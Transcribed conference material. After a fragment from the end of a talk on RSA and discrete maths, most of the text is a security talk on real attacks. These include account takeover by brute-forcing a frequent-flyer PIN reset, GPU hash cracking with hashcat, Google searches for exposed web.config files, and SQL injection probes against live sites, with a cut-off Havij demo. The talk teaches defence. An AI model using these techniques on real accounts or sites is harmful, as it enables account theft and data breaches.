like a cooking show where there's, you know, we mix something up. We say, put this in the oven for an hour, and then I go to this other oven and I open it. And I say, oh, look, it's done. I got some numbers prepared for us just to keep this from being too tedious. I need a P and a Q, right? So let's say I'm going to define P as 89. Now, P happens to be prime, or 89 happens to be prime. Just trust me on that. You can check me later. Q, I'm going to pick another prime, and that's 113. Now, I have, what do I call this? Prime? No, I have a prime checker. You're going to take my word for it. So then I'm going to define N as the product of P and Q. All right? So that's N, that's P, and that's Q. Now, I have to compute the totient of N, phi of N, and that's just going to be phi of N. I've got a function to compute totients. And in this case, the totient of 10,057 is 9,856. And so I have this symbol sitting around now that does that work. What was the next thing I had to do? I need a D, don't I? Now, the way I come up with D is I cast about for random numbers, which is kind of weird in terms of implementation. I have to be careful with that. But I go, I go, and I generate random numbers, and I test them to see if they're greatest common divisor with phi of N equals 1. Now, like a good cooking show, I happen to know 299 works. And let's just test that. Greatest common divisor of D and phi of N is 1, we're set. So now I have P, Q, N, and D. What do I need? E. I got to have E. And so I need the extended Euclid. By the way, let's, that's unpleasant if you don't know closure. There's some looping constructs and things in there. Don't let it bother you. But that's what the code looks like. And so we're going to say the extended Euclidean algorithm on A and B. So that was D and phi of N. Yes? I'm going to go back to my slide. I'm actually confused now. So math is hard. Yeah. So we had A and B were D and phi of N. So that's good. D and phi of N. That gives us two numbers, 4,400 E3 and negative 136. We're just going to pick the positive one. So we will define as, yeah, that was E as the max of all of those numbers. And now we have, oh, yeah, that worked. Let's try apply max. And now E is 4,483. So I have N, P, or Q, N, D, and E. So I can define a message. Somebody give me a four-digit number. Okay. It's funny. That never happens. And you said it, like, why are you even asking me, obviously. And I, fair enough. So, and I can use my seed planting, power seed planting, actually power mod guy to say, well, we want M to the D mod N. So let me now hand off 7,035 to somebody, and nobody in the world will know what that means, 7,035, unless they are in possession of E in which case they can get back to being leet again. And that, my friends, is why the internet is commercially useful. So closure code is there. Should you happen to be interested? There's also some other fun discrete math tricks like how to figure out whether an ISBN 13-digit ISBN is valid. You know, it's stuff that really matters to you. Keeps you up at night. So, and thanks. You guys have a great day. And thanks for another visit to Oslo.
|
What do you need to know about prime numbers, combinatorics, and the underpinnings of public key cryptography? Well, maybe more than you think! In this talk, we'll explore the branch of mathematics that deals with individual, countable things. Most of the math we learn in school deals with real-valued quantities like mass, length, and time. However, much of the work of the software developer deals with counting, combinations, numbers, graphs, and logical statements: the purview of discrete mathematics. Join us for this brief exploration of an often-overlooked but eminently practical area of mathematics.
|
10.5446/50872 (DOI)
|
Alright, welcome everyone. This is a good turnout. Look at this. Who was here for my talk a couple of days ago? Everyone. A lot of people. So a couple of days ago we looked at a whole bunch of online attacks that had happened in the past. So real world attacks, things that had actually happened and there were lots of power points. And the power points are kind of good because you get to see a little bit of info and some real world stuff, but we didn't get to break anything and I left feeling really empty. So today we're going to break a bunch of stuff in a talk that I have called How I Hacked Myself to Norway. So for those that don't know me, I'm Troy Hunt. I'm at TroyHunt.com and at Troy Hunt. And a lot of what I'm going to talk about today is online on my blog or in my Plural Site courses or places like that. So if you want more info, go and get it from there or whine me after. So where I thought we'd start is to give you a bit of a context of why I'm doing How I Hacked Myself to Norway. And the thing is Australia is a very, very long way away from Norway. Now sometimes I say this and people go well Australia isn't that far away is it? That's not Australia. They're the guys with the mountains and the later hoson. So that's not us. We're the guys with mick dun dee and the drop bears. So they're the ones that you want to watch out for. Now if you don't know a lot about Australia you can go and Google it and what you'll find is that it is a very, very long way away and it's about 15,000, 16,000 kilometers away. And what you'll find is that it's a very expensive trip to get from Australia all the way over to here. So before I left I decided I'm going to need some spending money. So I went out and I grabbed some credit cards and I thought this would be a good way to start. Now they don't want to guess where do I get these credit cards from? Shut up. Okay, so those who didn't hear the gentleman at the front, the noisy Irish man, I got them from here. Hey, people put their credit cards on Twitter. Why do they do this? You know taking photos of your breakfast is one thing, this is a whole other thing altogether. You know it's a social thing, they get excited and they want to share everything they're doing. So of course they've got to take a photo of it and they've got to put it up on Twitter. I particularly like this one. Oh my God, I'm so happy here's my credit card. Now here's the funny thing because if you jump over onto Twitter you'll find that there is an account that is called Need A Debit Card. And Need A Debit Card very conveniently retweets photos that people take about their debit cards. I really like this one because he took a photo of the back of his arm. So that was enormously convenient and I'm ever grateful. Now the thing that strikes me with this is that when we look at people posting credit cards on the internet we forget how easy they are making things to break. So everybody's worried, well we worried about the Chinese, now we're worried about the Americans. We probably should be a little bit worried about everyone. But what I find interesting is when we're worried about the NSA we're worried about the fact that they've influenced cryptographic standards and broken random number generators and have done all this fancy, fancy stuff and then we've got these guys just going here's my credit card. Take it. So the point of this is that we're getting into this era where breaking security is often really easy because it's just so in front of us. It is not a hard problem. Now to that effect I was looking at my Facebook the other day and a friend of mine posted this and he was very excited because as you can see from the bottom he was doing a fist pump because he got a first class upgrade. I was doing a fist pump because he gave me his boarding pass but it begs the question what can we do with the boarding pass? This is real too I didn't make this one up. I better get his name off the screen. Oh crap. Okay so on the boarding pass we have things like a name and we have a frequent fly number. This is enormously convenient because we can go and do things with this. It's a quantus frequent fly number. Now if you take a look at the Qantas mobile app one of the things the Qantas mobile app lets us do is login with a membership number, a last name and a pin. Just one point on pins. What I secure my luggage with is not a suitable pin to secure my millions of frequent fly points and my travel history and my family names and everything else but somehow pins have become a thing. Now moving on what we can do is we can go through and say that we have forgotten our pin. Now if we have a membership number and a last name, who knows where we get that from, we can then go through and do a reset process. The problem with the reset process is that if we do this they're going to send him an email with the details of the reset. Now I don't want to send him an email because it kind of blows the point. But if we go over to the website then we can start to do something a little bit more interesting. We have two options. Send a temporary pin or don't send a temporary pin. Now the other thing is this Qantas website's got a little triangle on the padlock. Everyone know what the triangle means? A little yellow triangle? It means don't trust it. So it's been loaded over HTTPS, it's an HTTPS address but then it's put something else on the page that is not HTTPS. We can't trust that piece of content. And a little bit later on we're going to see exactly what it means not to be able to trust a piece of content on the web. So for now it needs a membership number and a last name. Now that much I can get. So what I'm going to do is we're going to fill this out. We're going to get the data off the boarding pass, fill in the details, obfuscated details, give it a last name. Now I don't want to send it to his email address because clearly that's not going to work in my favour. So we'll do this. So next up, we're going to need three different pieces of information. And in the first section I can have either his mother's maiden name which I've got no idea about or I can have one of the last few flights that he's taken. Which begs the question, where am I going to get one of the last few flights that he's taken? Served up on social media. So thank you very much. We'll just take all that information. If you'd like to carry a flight number. If you just pump first class. Flight date. Very good. Okay. So we've got all that information. Now we need two other pieces of information. That's what this additional information bit down the bottom is. And one of these pieces of information is extremely easy to find out in the era of social media. So if I want to find out his birth date, I could just look at his profile and see everyone saying happy birthday. Not only happy birthday on a date but happy 30th or 40th or whatever it was at the time. So we get a year as well. So birthday, that easy. We have many, many, many, many ways of getting birth dates off people in this day and age. Now the other two. Offer skated. Offer skated. Mailing address. So he's moved around a bit. I don't know the mailing address and if you don't get the string just perfect then it doesn't match up to what's in the database and the whole thing falls on the heap. Now the data joining is a little bit interesting though. So here's what I'm going to do. With the data joining, we're going to put in some sort of random date. Jan, keep going, keep going, keep going, 1990. Now it's probably not going to be right but it doesn't matter that it's not right. So let's try that. Okay. It doesn't work. Now before I did this, I opened up Fidler. So who uses Fidler? Those of you that don't should. It's very, very good. So Fidler is an HTTP proxy tool and it can capture all of the requests that you make from your machine and as we'll see in a little bit of time, also the devices that are around you. So what I did is I captured that request in Fidler. So at the top left there you see it was request number 22. It was going to quantist.com.au. What I've done is I've taken that request and I've dragged it into Fidler's Composer. So Fidler has a tool that lets you take a request, put it in the Composer and then see everything that was in that request and reissue it. So we see we've got request headers which is a great big bit in the middle and because it was a post request it's got a body which is everything down the bottom right. So what we're going to do is take a look at what's in that body and in the body we have the month of joining which is what we just filled out before, number one, Jan. And we've got the year of joining being 1990. If we increment it and change it to two and reissue the request, we get another response. The response has an identical body size so it's probably going to be the same message that's come back and that message was the one that said, sorry some of your information is incorrect. So keep trying. Three, four, five, six, seven, eight. Same response, same response, same response, same response. And then finally we get a response that's bigger. Okay, this one's just over 7K. So what ended up happening was that response was the one that said, okay, you have now got the information correct. You have picked the right month of joining and year of joining as well as the other data which we knew was right because he gave it to us on his boarding pass. So all of that's gone off to the server. And the first interesting thing here is that QANUS and many companies do this, I don't want to just pick on QANUS, but QANUS has got brute force protection on the login. So they don't want people to try logging in too much with a particular membership number and sort of random pins because otherwise, you know, it's a membership, it's a four digit pin. So you've got 10,000 possible options. You're going to knock it off on average in about 5,000 guesses. Probably less because there's common pins and you go through a dictionary. But what they don't do and what many don't do is there's no brute force protection on the process to reset the pin. So it doesn't matter that I can't log on, that I don't have the right pin because I can just go and reset it anyway. So that then allowed me to go into the website because now I know the month and the year of joining, fill that in, back into here. Now I've successfully verified my identity and it's going to let me change the pin, which is great. So I can put in my own pin. Confirm the pin and we'll update. And we're done. Forgotten pin confirmation. We have his account. So that was how easy it was. So what can you do when you get his account? Well, once you're into a frequent flier account, obviously you get all travel history. You can go and buy tangible things to send to yourself. You can buy other people tickets. You can buy me a ticket. It can only be spouses and significant others. So I do have to be his gay lover, but I can get a ticket. And because this is being recorded just for the record, I didn't do it just like this. I used my own account to test whether issues. So, mate, I didn't steal your points, don't worry. Relax. All right. So that's a pretty sort of obvious basic kind of set of risks. What I thought we might take a look at next is around mobile devices. And all of us have got a heap of mobile devices. Most of us in the room have probably got two or three IP addresses. A lot of them are probably talking over the Internet, but I'm going to come back to that because it's going to be a bit interesting later on. Now, how many apps do you think most devices have on them these days? Most phones, tablets. Any guesses? I heard a 50 here. So the sort of commonly accepted wisdom is somewhere around 40 to 50 different apps on most mobile devices. Now, how many of those do you think have serious security vulnerabilities in them? Every time I ask, someone always says all of them. So based on what I look at and I go through and look at a bunch of apps, I would say probably about half the ones I see have serious vulnerabilities in the way they communicate over the web. And what I thought I might do is talk about some of the cases I've seen and then show you how we can identify it in one and another live demo. So one of the ones I saw quite recently was reviewing an app. And normally when I review a mobile app, the first thing I'll do is I'll proxy the data from the device through Fidler. And we'll do this in a second so you'll be able to go away and do it yourself to your own apps later on. Now, when I proxy the data through this, I could see the web service that it was hitting and I could also discover other web services. So often, depending on the technology stack, web services are very nicely documented. You find one and there's another page that lists all the other web services. Now, one of those other web services was called Get Users. And true to its word, it did exactly what it said it would. It got users. It got every user and every username and every password. And it returned it all over a nice API in JSON. So it was a nice fast request. And when I found this and I spoke to the developers and said, look, I'm thinking of a little bit of a problem. This is what I found. And I said, look, all I did was I just proxied the data through Fidler and I found this. And they said, oh, it doesn't matter. Our users don't use Fidler. This is a true story. A kid, you're not. So I think the lesson there is that we do become very complacent. So we build systems with an intended function and an intended way of being used and we expect everybody to play nice and do it that way. And the reality of it is there are people out there who don't want to play nice and unlike me, actually have an evil intent as well. That's one. Another one recently, this was around a bank. And in fact, I was preparing a demonstration for TechEd. And I wanted to show an app that did security very well when it came to validating SSL certificates. And I looked at this bank before, just a random, I wonder what this app does. Open it up, bang, there we go. Everything's okay. So what should normally happen is if you proxied data through something like Fidler, Fidler can create a self-signed certificate for HTTPS request. So it can actually return a certificate that won't be valid on the client, it's self-signed. It's not issued via a certificate authority. But it does mean that there can be an HTTPS communication. Now normally, the device, if it gets a self-signed certificate that's not valid, will throw its hands up and say, no, this doesn't check out. It's like every now and then you go to a website in the browser and Chrome goes all red and it says this certificate is invalid. It's not the right certificate or if it's expired or something like that. So mobile apps normally do that. And basically every modern protocol or every modern framework that allows you to make HTTP request does this implicitly. You have to consciously go and turn off certificate validation. This bank had done that. It was one of our largest banks in Australia. So they had actually turned off the certificate validation. Now I imagine it was very convenient because for the developers, they didn't have to worry about getting certificates on the machine. We'll just turn it off and we'll ignore it and then we can just do whatever we want. Of course, the right way to do it is to actually create a self-signed certificate and trust it on the device. So effectively compromise your own device in order to be able to test your mobile app. These guys didn't do that. So one more before I move on. There was an incident with Westfield shopping center in Bondi in Sydney and I wrote about this a few years ago. So it's a big sort of detailed blog post on this. And these guys had a mobile app where if you went to the shopping center and then you spent all day shopping and mucking around and losing track of time and then you went to cry and find your car again and you couldn't find your car because it was a big shopping center, you pull out the app, you put in your number plate and it comes back with these four grainy pictures. They're sort of obfuscated. You can't quite see the number plate but you can see if it's a big SUV or a little red sports car, whatever it may be. And you click on the one you want and it says, okay, here it is and you can go and find it. So they'd gone to some length to make sure there was no personally identifiable information such as a number plate. So that was good. The bit that was not so good is that the response behind that, so the JSON response that had the position of the car park and the, I guess the ID of the image also had the number plate. So it was actually sending that number plate back. So once you proxied the traffic, you could get that request, run it again manually and get four results. Now the way they made you only get four results is they passed four in the request. So we're going here. You could change four to 40. You could change 40 to 4,000. You could get every single vehicle in the car park just by parameter tampering. Now that's not the way the app's meant to work but it's just an HTTP request. You can find it very, very easily. The other thing you can do is you can run it every 60 seconds so you can start to profile traffic coming and going. You can start stalking people. When does this person arrive at the... You could probably do a very nice app in today's cloud world that you got notifications as soon as this car went into the shopping center and did terrible things. But the other thing these guys did is for the sake of convenience they also had the control centers for the shopping center on the same IP address that the service was on. So once you took out the path of the API, it exposed the paths to do things like change the number of available spots in different car parks, change the wording on the signs, which I did not do. So I spoke to those developers as well and firstly they did feel rather bad about it because it made a lot of press in Australia and it didn't look very good for Westfield. And they said, look, the reason why they did it is because it meant they could write the one API and they could use it everywhere for their admin system as well as for mum and dad who just lost the car. Reuse. But a very bad example of reuse. So let's have a look at what this looks like. And here's the example I thought we'd used. So on my way here getting back to the theme of the talk, I'm in Heathrow and I'm trying to get Wi-Fi access. And like most airports, Wi-Fi access is terrible. And you get on this thing and it gives you 45 minutes and it's crap the whole 45 minutes anyway. It's terrible speed. Then it says you've got to sign in and you've got to get more Wi-Fi access by handing over all your information. And then I found a spot that had good Wi-Fi. A spot they wouldn't let me into. So I'm standing at the front here and thinking, all right, well, what can we do in order to maybe see how we can get some British Airways Wi-Fi? And what I found was that I had the British Airways app on my phone and I still had crappy public connectivity. Now the British Airways app has a feature where if you are a silver or gold executive club member, you can get Wi-Fi passwords. Now I'm not a silver or gold executive club member, but let that not deter us. So here's the demo we're going to run. So what I did to my iPhone is I set it up to proxy traffic through my PC through Fiddler. So anyone that has an iOS device can easily do this. And we're going to do this with my phone now. Other devices have different ways of setting up proxies, but the bottom line is that you can say I want all the traffic from here to go through there and we're going to watch it as it goes. So my phone is currently set up something like this. It's a different IP address. It's the IP address of my PC at the moment. And what we're going to do is we're going to go over to Fiddler. Now you can get Fiddler from getfiddler.com. It's free. It's awesome. It's been tracking some requests here that I'm going to get rid of. Now all you do to enable this in Fiddler is we go up to tools, Fiddler options, connections. Now Fiddler is listening on port 8888. So that's what we had over here, just there. And we are allowing remote computers to connect. Now once we do that, I can unlock my phone and if I open up, say Safari and I refresh and I find I've got no internet connection because it's died again, I'll just get my internet connection back. Hmm. Or my phone is no longer connecting because maybe my IP address has changed and this is the joy of the live demo. I saw a lot of demos fail earlier this week. Okay, so let's check this and if I can't get the IP address right, then I will go to my backup save trace. So what I'm doing, the IP address, so that I can probably get it right as well, so here's my IP address, 10, 15, 5164. 10, 15, 5164. It should be right. But if it doesn't work, I will open up my save Fiddler trace and it won't matter. I'll give it one more go. That wasn't me. Somebody hack me? Mr. AV man? Well, that's good. You fix that. I'll fix my Wi-Fi. Listen, just because you're... All right, so while that is being fixed, we'll... Did I stand on it? Did I hack myself? Crap. Okay. We're coming back. Actually, while the screen's gone. Okay, it's coming back. So while the screen was there and you couldn't see what I was doing, I just fixed everything and made it work and it looks like... So while he's doing that, you can actually do this with any of your apps. I mean, at the end of the day, when you open your apps, they're requesting data that the provider is happily sending down to you and sending into your phone. You can sit just here and see what's going backwards and forwards. So some of the sort of things that I often see go backwards and forwards. A couple of funny ones, particularly things like really, really inefficient requests. I wasn't... Oh, I'm switching my story. Okay, I'm sorry. I'll come back to the inefficient request. So while he was away and I made everything work, when I opened that British Airways app, I had several requests. We can see here British Airways. Now, one of these British Airways requests went here, lounge. We can go and look at the data in lounge. And if we look at the data in lounge, they have very kindly sent us all the Wi-Fi passwords. Yay! Now, let's be clear. They sent them to me. All I did is... And also, seriously, all you do is download the app, install it, and they send you the data. Now, to bring this back to a point about application security, they are making the assumption that the authorisation is going to happen on the device. So they're just going to give you everything and you're only going to be able to unlock the feature on the device when you provide your particular membership details and it authenticates you. But they've already sent you the data. They're just not expecting that you can go and get it in a way that they didn't intend. Now, to finish my story, one of the things you often find is particularly really, really grossly inefficient requests, which is particularly bad on mobile devices because, of course, you're on 3G and they're bad connections and you've got batteries to worry about and things like that. So I'll often see things like you'll go to, say, magazine app. And in fact, I saw one for FoxTel in Australia, so I paid TV. And in the FoxTel app, you'd have all the channels and you'd have tiny, tiny, tiny little bitmaps of each channel. Now, they look tiny, but they're actually about this big, they're huge. Each one of them was like a megabyte. And they were downloading a megabyte of image each time you opened up the app. And that's one megabyte just for each channel. And then you got a whole bunch of channels. And I tweeted something about it and the guy who was involved in it responded. And he actually had a very good reason for it. That was just how he was given the images. Interesting. Go to Nick's performance talk. Learn how to compress images. It's easy. All right. Let's try and get us back on track. So eBay. eBay a couple of weeks ago got hacked. And eBay said they had 145 million active accounts hacked. They didn't tell us how many inactive accounts were hacked. And as funny as that sounds, when Adobe got hacked last year and around October, they kept saying they had some tens of millions of accounts hacked. 20, 30 million. I have 152 million Adobe accounts. And I have them because they're all published publicly. So often when there is a breach like this, the scope of it is underestimated for obvious reasons. So for eBay, I suspect that, and all we got to do is just think about the size of it and the scale of it. Every opportunity, there are a lot more than 145 million. Anyway, what I was interested in is the way Adobe or rather eBay was storing their credentials. And when I was reading around a little bit, I found some info. So Ask eBay, the official verified Ask eBay account. We store encrypted passwords that have been hashed and soldered. What's wrong with this sentence? You'll find out in a moment. Main thing being that encryption and hashing are very different processes. They're both cryptographic processes. But encryption is a two-way thing with private keys and you encrypt and you decrypt and there are other semantics that make it fundamentally different to hashing and salting, which we are going to have a look at in a moment. So that was a little bit confusing. So I read a little bit further. And I found the official eBay statement from when the breach occurred. And the official eBay statement said that they were encrypted passwords. Okay, good. So they're encrypted. They're not hashed. Then I read some more and the eBay spokesperson said that they were using a sophisticated proprietary hashing and salting technology. Now when we talk about the attributes of cryptography, proprietary isn't normally the one we're looking for. I've seen proprietary encryption before and it was called Base64. Now the point is we have got to get away from this we encrypted data when what we really did was hash data. These are two fundamentally different things and for God's sake stop saying that they're encrypted when they hash because people hammer you every single time because you shouldn't be encrypting passwords. What we should be doing is hashing them. Not quite like that but it's, you know, try and find a better hash image that isn't a hashtag. Now the idea of a cryptographic hash is that it is a one way deterministic algorithm. So what it means is you have a piece of text like a password. Say it's password but it's got a zero instead of an O so other people can't figure it out. And you create a hash it creates a cypher, it creates an output. Now you might use an algorithm like say MD5, for fragment's sake. Every time you hash the word password with a zero with MD5, it doesn't matter where you are, what PC it is, where it is in the world, what language it is, you always get the same cypher. That's the deterministic part of the hashing algorithm. So what we used to do is we would hash the password and we'd store the hash in the database next to the username and the email address and all that other stuff. When someone comes and logs in, we take the password they give us, we hash it with the same algorithm and because it's deterministic, if it's correct it will match the one in the database and then we can say, okay, you can log in. Now the problem that we had with that is that when you do that you can pre-compute all these hashes. You can get all these common passwords and create what we used to call rainbow tables and then you take the rainbow table and you can pair it to the hashes from a breached database and when it matches, the rainbow table also has the plain text. Messes it right up. So we started adding salt and the idea of the salt is that once we have salt on a password we have randomness. So what you might do is you create say 32 random bytes, you get the password, you put the salt with the password then you hash those and you store it in the database. So you store the salt and you store the cypher. When someone comes to log in you use the username to pull the salt back, add it to the password they've just given you and hash it. So it kind of looks ultimately a little bit like this. Hashing of the salt in the password and that creates the cypher. Now in your database you then have something that looks like this. So you get a whole bunch of salt, it's a whole bunch of hashes. One of these for each person. So this is what we'd refer to as a salted hash. Now is this a suitable mechanism of password storage? Shaking heads. Other people not wanting to say. So I'm going to give you an example. What we see here is salted hashes from the ASP.NET membership provider, the one that came with the Visual Studio 2010 project. So if you've ever written ASP.NET web applications you have probably done something like this before and thought it was safe. And I'm going to show you why it's not. So here's what we're going to do. I have a little tool here called hash cat. And what hash cat is, is it is a GPU cracking password hacker. And what that means is we can run this command. And this command is saying let's run CUDA hash cat. So CUDA is a GPU made by Nvidia, which is what this machine runs on. It's just a little laptop. You could also do it with OCL, which is what you get say an AMD graphics card from. But it's going to do cracking in the GPU. It's going to run this against pattern 141, which is the ASP.NET membership provider. So we're effectively saying it's one round of salted char one. It's going to take salted hashes.text, which is basically what I showed you on that last slide, salt's hashes. And it's going to use my hash killer dictionary. Now this is a password dictionary with about 22 million plain text passwords in there. All it is is each row by row by row is a password. Not like an Oxford dictionary, just passwords people have used. And we're going to run this. Now what is happening is it is going through and rehashing with the salt and comparing it to the stored passwords. So it goes to the password dictionary, gets a password, takes one of the salts from the previous screen, adds it, hashes it, compares it to the cipher. What we can see going through here, if we break this little screen down a little bit, is we had our salts, which are over there. These are our hashes and these are the plain text passwords that is cracking out of them. So we are cracking these passwords from the membership provider. And it is just flying through and it's finished. Oh wow, look at this. So the main thing here is that we just did 11,911 killer hashes per second. So we did about 12 million hashes per second in this tiny little old crusty laptop. When I run this on a modern graphics card like something like an AMD Radeon 7970, MD5, we can do about five billion hashes a second. SHA1, you can do about two billion hashes per second. The point is that you can recompute the hashing process so quickly you don't even need rainbow tables anymore. Talking to people that really, really, really know this stuff inside and out, let's say rainbow tables are too hard, they're too big, we don't need them. So even when the passwords are not salted when we don't have this randomness, GPUs have gotten so fast if we can do billions of hashes a second why don't we just hash your dictionary and see what matches up. So if you have the ASP.NET membership provider from 2010 or earlier, you have some work to do next week. Yeah. Yeah, good question. So the question was the passwords there were all quite short. They're pretty simple passwords and how much faster would it be for larger passwords? So the reason why I've chosen these, first of all, these are all very common passwords, things like QWERTY. It's a crap password, we all know that, but it is extremely common. Because this is working through a password dictionary, and I'd open it but it's like a 220 meg file and this machine doesn't go too well, but because all it needs is a password dictionary that already has passwords in it, it doesn't really matter whether they're short or longer. It's not like going through every possible character range from 6 to 12, alpha numeric, you know, lower case. So it doesn't really matter what the range of characters is if it is in the password dictionary, it gets cracked just as fast as monkey or something like that. Now the question is, is it going to be in the password dictionary? So if you've created a long random password with say password manager, it's almost certainly not going to be in there. If you've tried to create something memorable, there's a good chance it will be. Okay, let's go on. Ooh, you guys. So before I came over, I was asking some people, what about Norwegian security? What about something a little bit topical? So why don't we see how you guys are going with security? So before I do this, what do you reckon? Is Norway good, security ones? Nobody wants to say yes. I think I heard one yes. I'm going to take it as a yes. So I started looking around for Norwegian sites. Now the problem I was having is that every time I found a Norwegian site, I couldn't see anything behind the ad. You guys have the hugest freaking ads, and yes I did actually measure it 63%. These are the most enormous ads I've ever seen. So it made things hard. What I decided to do is go through the Alexa Top 100 sites for Norway and start going through and looking for security risks. And in all honesty, you guys will love this, the security was actually pretty good. So I thought instead of breaking Norwegian sites, I'd show you some good practices from Norwegian sites and then we can look at how things should be done and then we'll find another country that's got crap security. Done our way. All right, so good example and these are just things that are immediately obvious security wise. So obviously HTTPS, it's got an extended validation certificate. That's the big green bit up the top. I can't pronounce what it says, but it is extended validation, which means that there's been a lot of due diligence that they've had to go through in order to demonstrate their identity, improve who they are to the certificate authority. The only thing I don't like about this is that padlock, that doesn't make it secure. A lot of people put bitmaps of padlocks right next to the logon, secure a logon because I've got a bitmap of a padlock. It doesn't work that way. You kind of need to see it up there in the address bar. So that was that one. So I looked at another logon and what you're seeing here is a very common, very basic test to see how the site responds to a possible cross site scripting attack. So I've just put in a script tag and I've tried to do alert XSS. If the site is vulnerable to cross site scripting, you get an alert box that appears on the page. If you don't, then it actually gets rendered. So we can see that it gets rendered to the screen. I can't pronounce what it says, but you can see it in text just down here. So what that means is things like the angle brackets have been encoded as ampersand less than and ampersand greater than and they're actually there in the HTML source. They haven't actually been rendered as a script tag. Another one here, basic SQL injection test. So can we change that URL from 479 to try and close off a statement and then add a condition and see if it behaves differently? What this has done is returned 404, so it's basically taken everything in that string and said it's not a valid ID, it doesn't match your record in the database. So that was good. So it was getting very hard on me to find a good site. Now this one, lots of response headers here, but there are three things that stood out to me in the response headers. Content security policy, talking about the things that the site can and can't do and the other sites that it can and can't do them to. Strict transport security, which is that fourth one from the bottom, we often call that HSTS. It means that once an HSTS header is set, if you go to a secure site and it responds like that, you can't then make an HTTP request. The browser has to honor that, which Chrome does, and Ancient Explorer doesn't, but it's a good header. And we've got a cross frame options header as well, and X frame options or XFO header of same origin, means you can't put this in a frame on any other website. You can put it in a frame on this website and that defends against clickjacking attacks. So that is actually rather good. So where else do we go for bad security? So I asked around and everyone said, you know what you should do? Does this look like they take security seriously? Not Abba, no. So that's not protection. Everyone said, everyone said you should do Sweden. And Sweden made it really, really easy. Now to kick me off, Nile sent me this. Now this is from Ikea in Norway, but it's like here at Swedish, so we're going to have a go at them anyway. And they sent this form when you went in your kitchen and they made it really, really easy for you to fill out these three things which I'm told are a username and an email address and password. And the irony of it is we're also worried about things like HTTPS and SSL and making sure we get our transport layer right. And these guys go, just write it down and hand it to the minimum wage guy at the desk. He'll fill it out for you. Now how many of these have the password of the person's Gmail account because they've reused it across everything? And they've got the Gmail account in the e-post. Is that email, e-post? Okay. Right, so very bad. So thank you Nile for that and for reconfirming the fact that clearly Sweden has issues. So because Sweden has issues, I thought we should do this. I take it as pleasant as people. I mean, that bad? I mean, it's not like the New Zealanders or anything other. It's the New Zealanders in the audience. All right, so here's what we're going to do. First one we're going to do is Swedish websites by FTP. Now in order to do this, we're going to need a web browser, two Google searches and an Allen key. Now, do not use the left-handed Allen keys. Do you get a proper right-handed Allen key? Okay. Now let's be serious and hack some Swedish websites. So here's what we're going to do. Swedish website. Now what we're going to do is just a really simple Google search and it's probably going to order completely for me. So we're going to do a search for in URL FTP. So did you know that Google indexes things over FTP? It's true, they do. It's not just HTTP. We're going to look for web.config in the URL. Everyone know what a web.config is? It's the configuration file with all your secrets for your ASP.net app. And just to be sure that we only get configs, we're going to make sure the file type is config and we're going to do a search. And we've just found 7,390 websites that have exposed FTP. Exposed web.config over FTP. But that's no good because we only want Swedish sites. So let's filter that. So let's go down to in URL. So we make sure that we only get Swedish ones. So there are Swedish websites. Now, if it wasn't a recording, I could click on this. But if you were to click on that, don't click on that, and if you did, it wasn't my fault. If you click on that, you will get web.config that probably have connection strings, user names, passwords, database names. You'll probably get API keys. You could probably take web.config off the path, go back to the root and find the folder called secret or private or things like that which you aren't meant to see, but because you've got anonymous FTP access, you can get it. Probably find database backups, probably find source control is often something that gets published, believe it or not. You can do just about anything. The other thing is, it's obviously anonymous FTP. Is it anonymous read only or anonymous write? Possible to face me. I don't know. I don't click these things. Way number one of Swedish websites. Way number two of Swedish websites. SQL injection. We're going to need for this. One Google browser. One Google search. One Havage. One Allen key. Everything in Sweden is an Allen key. Now, who here has an understanding of SQL injection? Quarter. Okay. Roughly. So let's do a bit of SQL injection one-on-one. So this is how SQL injection works. Now, let's imagine we have a URL that looks like this. Very common looking URL. Very semantic. I would like product number three. We have two parts here. We have a resource which is clearly the URL and the path. And then on the right hand side, we have the query stream. That inevitably translates down to a SQL statement that looks something like this. And we have two parts again. So we have the query and we have the parameter. Pretty basic how to build a web app one-on-one. Now, the thing about this is that everything on the left hand side is trusted. It's trusted in so far as we built it, we own it, we run it, we support it. It's in our system. Everything on the right hand side is untrusted. And when I say untrusted, I mean it is coming from an externality, from an external source. It's going to be query string in this case. It could be form data, so post data. So we saw that earlier with Qantas. Untrusted form data. It could be request headers. The user agent is untrusted data. You can change the user agent and reissue the request. So what we're going to do is look for Swedish websites that we can SQL inject. So let's go back to the browser. We'll do another Google search. And let's just drop down to SE like that. Now, there's a very common pattern that often indicates that you have a SQL injection risk. If you have classic ASP, you probably have a SQL injection risk. If you saw my talk on Wednesday, we looked at Bell. And I said Bell was running classic ASP, almost certainly they have a SQL injection risk. So Bell obviously did because all their data is got put on the paste bin and they had a big problem. But let's have a look at this guy. Bad taste records. It's all in English, but apparently it is Swedish, so I reckon it's fair game. All right, so we look at the URL. Now, we can add one character to this URL and determine if there is a SQL injection risk. So any guesses? If we had one character. Single quote. Single quote might do it. I'm going to go with one that I know works. It's not hacking for only one character. Okay. So what are we seeing here? We're seeing one character. We're seeing one character which has caused an internal exception. The internal exception has bubbled up as a Microsoft OLED provider exception. Somewhere under here we have my SQL which has tried to run a query that hasn't worked. And inevitably what's happened is it was expecting to get an integer as the value of ID and then it would pull that and pull the record from the database. Now, we've changed that integer into a string. So effectively it's probably written a query that goes something like select star from bands where ID equals 3X2. So my SQL has gone and done an equivalency of actually thinking that it needs to find another column called 3X2. And it's told us that there is no column. So it's telling us that it's bubbling up internal exceptions. Now, who has never mounted a SQL injection attack? What? Everyone has? Come on. Who has never mounted a SQL injection attack? Anyone here? Do you want to come here? We don't do enough interactive stuff in these shows. What's your name? Jeff. Get out, Jeff. Troy. Come over here, mate. All right. So everyone, please note for the record, Jeff is now hacking. No, don't go away. You are. But just to be safe, we're not going to hack this website. We're going to hack another website. So I've created another website over here called Supercar Showdown. Now, I created this for a plural site course called Hack Yourself First. It's got about 50 vulnerabilities in it. If you want to hack, go to hackyourselffirst.troyhunt.com and go nuts after Jeff, not before Jeff, because otherwise the demo is not going to be real good. All right. So what we're going to do, so you really are driving, Jeff, do you want to just scroll down a little bit on the page? All right. So we've got three different manufacturers here. Just click on the view link for one of those. So pick one you like. Good choice. Now we look at the URL. So that is a suspicious looking URL. So let's copy it. I'm not clipboard. Okay. Good. Now we're going to open Havage. So see the little carrot down on the taskbar. Okay, open that go out. All right. Now let's just maximize that because we're going to get a bit of data if this all works. All right. Now let's paste that into the target. Now you can go and get Havage for free from itsecteam.com. You've done this before. You know where to go. Analyze. So basically what's going to happen here is Havage is going away making HTTP requests to this website and it's making them in such a way that it's trying to cause exceptions in the database so that when the exception is exposed, like we saw before with our Swedish mates, it's going to disclose information. And it's already told us that the database name is hackyselffirst underscore DB. This is an Azure website with SQL 